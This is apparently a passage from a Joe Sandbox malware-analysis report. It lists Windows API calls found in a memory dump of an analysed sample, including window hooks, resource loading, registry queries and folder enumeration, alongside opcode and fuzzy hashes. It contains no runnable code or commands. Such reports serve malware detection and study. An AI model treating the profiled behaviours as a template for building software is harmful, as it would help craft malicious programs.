                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Message$CallbackDispatchDispatcherTranslateUser
                                • String ID:
                                • API String ID: 2960505505-0
                                • Opcode ID: b4a6a35ade7ed14936ff1922dd7b31983e8294f2af7dbd9086ee59b7b801dfec
                                • Instruction ID: 06f4cbef7ab207f2fff16cb34858fb85fe973bf41392bcce92dd4f4ecb0072a7
                                • Opcode Fuzzy Hash: b4a6a35ade7ed14936ff1922dd7b31983e8294f2af7dbd9086ee59b7b801dfec
                                • Instruction Fuzzy Hash: 93F05E71211851AFA7156B319C089BF76ACEF0135BB05406BF801C6212EB68CD468AEF
                                APIs
                                • FindResourceA.KERNEL32(?,?,00000005), ref: 00456168
                                • LoadResource.KERNEL32(?,00000000), ref: 00456170
                                • FreeResource.KERNEL32(00000000), ref: 00456188
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Resource$FindFreeLoad
                                • String ID:
                                • API String ID: 934874419-0
                                • Opcode ID: ab0f40a6e43c0a41c589bfbde39cb591226471d23c8e9bd6ba915b6870995341
                                • Instruction ID: fccebd9682a858cdeb5031e85e51eaab4cad9e1c6797173475c662a524fb5943
                                • Opcode Fuzzy Hash: ab0f40a6e43c0a41c589bfbde39cb591226471d23c8e9bd6ba915b6870995341
                                • Instruction Fuzzy Hash: 0AF05471601B11ABC7105B659C88EABFB9CFF59366F45002AF944C3312D77898048AA9
                                APIs
                                • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 0042EFD4
                                • SendMessageA.USER32(?,00000143,00000000,?), ref: 0042F03E
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: e11a1a5f31f4cb33b024c01f2dbf4c1542a7e5af66afb4619ba965c6068a4425
                                • Instruction ID: cfda056f3e1bfb89349e09b922290d6e6db6a01bb08bf723edffdc8e6ae5ea85
                                • Opcode Fuzzy Hash: e11a1a5f31f4cb33b024c01f2dbf4c1542a7e5af66afb4619ba965c6068a4425
                                • Instruction Fuzzy Hash: 4C110A71204750ABC310DF59D880F97B7E8FB48B14F80063EF46497681D738E8058BA6
                                APIs
                                  • Part of subcall function 0045982D: GetWindowLongA.USER32(?,000000F0), ref: 00459838
                                • GetWindowRect.USER32(?,?), ref: 00457D0C
                                • GetWindow.USER32(?,00000004), ref: 00457D29
                                  • Part of subcall function 00459926: IsWindowEnabled.USER32(?), ref: 0045992F
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Window$EnabledLongRect
                                • String ID:
                                • API String ID: 3170195891-0
                                • Opcode ID: e782368540316d1cacdbfc55745b2c3869e6f7dbff5383a13291f65101c725e8
                                • Instruction ID: 375d3ee3df655b8212e251599233aac5bdcbf11d9cda8cb0e33f1c270f2b4009
                                • Opcode Fuzzy Hash: e782368540316d1cacdbfc55745b2c3869e6f7dbff5383a13291f65101c725e8
                                • Instruction Fuzzy Hash: 3101A7316046089BDF14EF25E855BBF77B5AF05306F00446AED02973A3DB78DD0D8A58
                                APIs
                                • __lock.LIBCMT ref: 00447CC3
                                  • Part of subcall function 0044D832: EnterCriticalSection.KERNEL32(?,?,?,00447CC8,00000004,004CAFC8,0000000C,0044D74B,00000000,?,0044ABA0,?,004CAFF8,00000060), ref: 0044D85A
                                • RtlFreeHeap.NTDLL(00000000,?,004CAFC8,0000000C,0044D74B,00000000,?,0044ABA0,?,004CAFF8,00000060), ref: 00447D0A
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: CriticalEnterFreeHeapSection__lock
                                • String ID:
                                • API String ID: 3012239193-0
                                • Opcode ID: ac1540a0b851fcdb40e3e79ba1efe0328e53520ba3295f022b908cb1df8d684a
                                • Instruction ID: d955b6addba1c6b7a19bfec433c3d98e9b43adaac541c227c5d3499d9416ad9c
                                • Opcode Fuzzy Hash: ac1540a0b851fcdb40e3e79ba1efe0328e53520ba3295f022b908cb1df8d684a
                                • Instruction Fuzzy Hash: 96F0B471D16315AAFF207B62AC07B6F7B60AF00769F20412FF410652D1CB7C5A52DA9D
                                APIs
                                • __lock.LIBCMT ref: 00447E2A
                                  • Part of subcall function 0044D832: EnterCriticalSection.KERNEL32(?,?,?,00447CC8,00000004,004CAFC8,0000000C,0044D74B,00000000,?,0044ABA0,?,004CAFF8,00000060), ref: 0044D85A
                                • RtlAllocateHeap.NTDLL(00000000,?,004CAFE8,0000000C,00447E93,000000E0,00447EBE,?,0044D7B5,00000018,004CBC70,00000008,0044D84B,?,?), ref: 00447E6B
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: AllocateCriticalEnterHeapSection__lock
                                • String ID:
                                • API String ID: 409319249-0
                                • Opcode ID: c04b9e8e06a6364d5c1f494db0ccfd713c89f64cbde72ec4706e017656008a0b
                                • Instruction ID: f1a8fd19c40bd1083452c9b815fd926fceb10cfad15d11fd48909767391a0784
                                • Opcode Fuzzy Hash: c04b9e8e06a6364d5c1f494db0ccfd713c89f64cbde72ec4706e017656008a0b
                                • Instruction Fuzzy Hash: 31F0CD32D416249AFB20BB759E0675F7760BB10728F30436BE8202A3E1C73C1D52CA8E
                                APIs
                                • GetWindowTextLengthA.USER32(00000000), ref: 0045DD2C
                                • GetWindowTextA.USER32(00000000,00000000,00000000), ref: 0045DD41
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: TextWindow$Length
                                • String ID:
                                • API String ID: 1006428111-0
                                • Opcode ID: 720720b7826cd516c124d1c9f667a6bb5a0a754d63c71446cbaca4b57f6d7706
                                • Instruction ID: 3df95a50f7c5756162ba1c81e646130b5dca14df09544dfd3e809bef63806a36
                                • Opcode Fuzzy Hash: 720720b7826cd516c124d1c9f667a6bb5a0a754d63c71446cbaca4b57f6d7706
                                • Instruction Fuzzy Hash: 59F0E932100105EBCB20AF51DC04DAF772DEF49362F04011AFD1547151DB385415CBA9
                                APIs
                                • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,80000002,?,?,?,0043062F,80000002,00000000,?,00402EF7), ref: 004305EC
                                • GetLastError.KERNEL32(?,?,0043062F,80000002,00000000,?,00402EF7), ref: 004305F9
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: ErrorLastQueryValue
                                • String ID:
                                • API String ID: 1349404517-0
                                • Opcode ID: 4b12fa7677ebd328b7f12a0ba8178812c3b22382074bc9e6808d752de9ad009f
                                • Instruction ID: fe9462d29a9da7b837a2406539751575587682de2b60d7ac772098d07a0583a7
                                • Opcode Fuzzy Hash: 4b12fa7677ebd328b7f12a0ba8178812c3b22382074bc9e6808d752de9ad009f
                                • Instruction Fuzzy Hash: 0FF01C722042116BD314CB58EC04F5BB7E8EBD8B51F10822EFA86D7280DBA0991587A9
                                APIs
                                • DefWindowProcA.USER32(?,?,?,?), ref: 004562B0
                                • CallWindowProcA.USER32(?,?,?,?,?), ref: 004562C5
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: ProcWindow$Call
                                • String ID:
                                • API String ID: 2316559721-0
                                • Opcode ID: 7c14ae1876ad108138e0c2b43aed3fef796ce7489ec108068f17dd744e4f0651
                                • Instruction ID: 724d7a8fdadb4652615dbb9f4325778996f429c979f1ed0c0a89b8764ad68d23
                                • Opcode Fuzzy Hash: 7c14ae1876ad108138e0c2b43aed3fef796ce7489ec108068f17dd744e4f0651
                                • Instruction Fuzzy Hash: 2FF01C36100605FFCF215F95DC04D9A7BB9FF08352F418469F90987631D776E824AB54
                                APIs
                                • HeapCreate.KERNEL32(00000000,00001000,00000000,004481DD,00000001,?,004CAFF8,00000060), ref: 0044D69F
                                  • Part of subcall function 0044D863: HeapAlloc.KERNEL32(00000000,00000140,0044D6C7,000003F8,?,004CAFF8,00000060), ref: 0044D870
                                • HeapDestroy.KERNEL32(?,004CAFF8,00000060), ref: 0044D6D2
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Heap$AllocCreateDestroy
                                • String ID:
                                • API String ID: 2236781399-0
                                • Opcode ID: bcabe9e55bb853ce9606875af35cc23512099b3aa20cb19af125bf1c2520e8ce
                                • Instruction ID: 75e7420880b69f34e065517e2ae9d8fd4c88d18d1bcf8fff13bf1802494dd5c5
                                • Opcode Fuzzy Hash: bcabe9e55bb853ce9606875af35cc23512099b3aa20cb19af125bf1c2520e8ce
                                • Instruction Fuzzy Hash: F1E0D871E113006BFB006F357E0832637D49B45345F014937F405D5294FB748410DA0E
                                APIs
                                  • Part of subcall function 00460C65: __EH_prolog.LIBCMT ref: 00460C6A
                                • GetCurrentThreadId.KERNEL32 ref: 00458AF5
                                • SetWindowsHookExA.USER32(00000005,Function_000588B4,00000000,00000000), ref: 00458B05
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: CurrentH_prologHookThreadWindows
                                • String ID:
                                • API String ID: 2183259885-0
                                • Opcode ID: f41d2774eea753fce7038d8cf1bba76ec0a83b13827fae0ef50e3a3f985bd47e
                                • Instruction ID: 5f91b5a6e92888a10516239ab813794ae4ba7b6c56ba3dc280b3d2880adb0640
                                • Opcode Fuzzy Hash: f41d2774eea753fce7038d8cf1bba76ec0a83b13827fae0ef50e3a3f985bd47e
                                • Instruction Fuzzy Hash: FAE09B717407009BD2306F125C0971776A8DBC4B27F10453FF945AA245DE74684CC67F
                                APIs
                                • RegOpenKeyExA.KERNEL32(80000002,80000002,00000000,000F003F,?,?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306B5
                                • GetLastError.KERNEL32(?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306BF
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: ErrorLastOpen
                                • String ID:
                                • API String ID: 3359735512-0
                                • Opcode ID: 35defb75280334056dcad91695dd74def03daa0eb104eab090d3a280f410746c
                                • Instruction ID: d694ad6d0416bea9128f64c78c3a1527c4c8503895f06f341b73c71a9d6b33f9
                                • Opcode Fuzzy Hash: 35defb75280334056dcad91695dd74def03daa0eb104eab090d3a280f410746c
                                • Instruction Fuzzy Hash: 7CD05E313057107BC3749B58EC04FA7BBD8EB88B80F00842AFA49C3250DAB0D840CBB5
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 0045B7D9
                                • SetWindowsHookExA.USER32(000000FF,0045B648,00000000,00000000), ref: 0045B7E9
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: CurrentHookThreadWindows
                                • String ID:
                                • API String ID: 1904029216-0
                                APIs
                                • LoadIconA.USER32(?,00000080), ref: 0043A722
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: IconLoad
                                • String ID:
                                • API String ID: 2457776203-0
                                APIs
                                • __EH_prolog.LIBCMT ref: 00457D65
                                  • Part of subcall function 00460C65: __EH_prolog.LIBCMT ref: 00460C6A
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                APIs
                                • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00458BBD
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Parent
                                • String ID:
                                • API String ID: 975332729-0
                                APIs
                                • __EH_prolog.LIBCMT ref: 00460C6A
                                  • Part of subcall function 004609B0: TlsAlloc.KERNEL32(?,00460C94,76F90A60,00000000,?,00460206,0045EC43,00460222,0045B32A,0045C845,76F90A60,00000000,?,00448293,00000000), ref: 004609D2
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: AllocH_prolog
                                • String ID:
                                • API String ID: 3910492588-0
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                APIs
                                • FindResourceA.KERNEL32(?,?,00000006), ref: 004011F7
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: FindResource
                                • String ID:
                                • API String ID: 1635176832-0
                                APIs
                                • SHGetSpecialFolderPathA.SHELL32(00000000,00000013,00000013,00000000), ref: 004056B0
                                  • Part of subcall function 00405260: FindFirstFileA.KERNEL32(?,?,\*.*,00000004,?,?), ref: 0040530E
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: FileFindFirstFolderPathSpecial
                                • String ID:
                                • API String ID: 4139272456-0
                                APIs
                                • InterlockedExchange.KERNEL32(004D986C,?), ref: 0045FE46
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: ExchangeInterlocked
                                • String ID:
                                • API String ID: 367298776-0
                                APIs
                                • SendMessageA.USER32(?,00001307,?,?), ref: 00454A64
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                APIs
                                • MessageBoxA.USER32(?,?,?,?), ref: 00456FB6
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Message
                                • String ID:
                                • API String ID: 2030045667-0
                                APIs
                                • IsDialogMessageA.USER32(?,?), ref: 00459823
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: DialogMessage
                                • String ID:
                                • API String ID: 547518314-0
                                APIs
                                • RegCloseKey.KERNEL32(00000000,?,00402F00), ref: 004305AC
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Close
                                • String ID:
                                • API String ID: 3535843008-0
                                APIs
                                • SetWindowTextA.USER32(?,?), ref: 00459898
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: TextWindow
                                • String ID:
                                • API String ID: 530164218-0
                                • Opcode ID: 413112a5c85e39164c15968a7be78b297692ec4c01c10a6d7691b3f161ac27a9
                                • Instruction ID: ce08906d4c308bcf959607817f9718b1f7e877e17a9a83edb3ef6e712208b152
                                • Opcode Fuzzy Hash: 413112a5c85e39164c15968a7be78b297692ec4c01c10a6d7691b3f161ac27a9
                                • Instruction Fuzzy Hash: C9D0CA70210100DFCB80EF01DA88B11B7B1BF5034AF6088FAE6484A262DB339C57DF05
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0045994E
                                Memory Dump Source
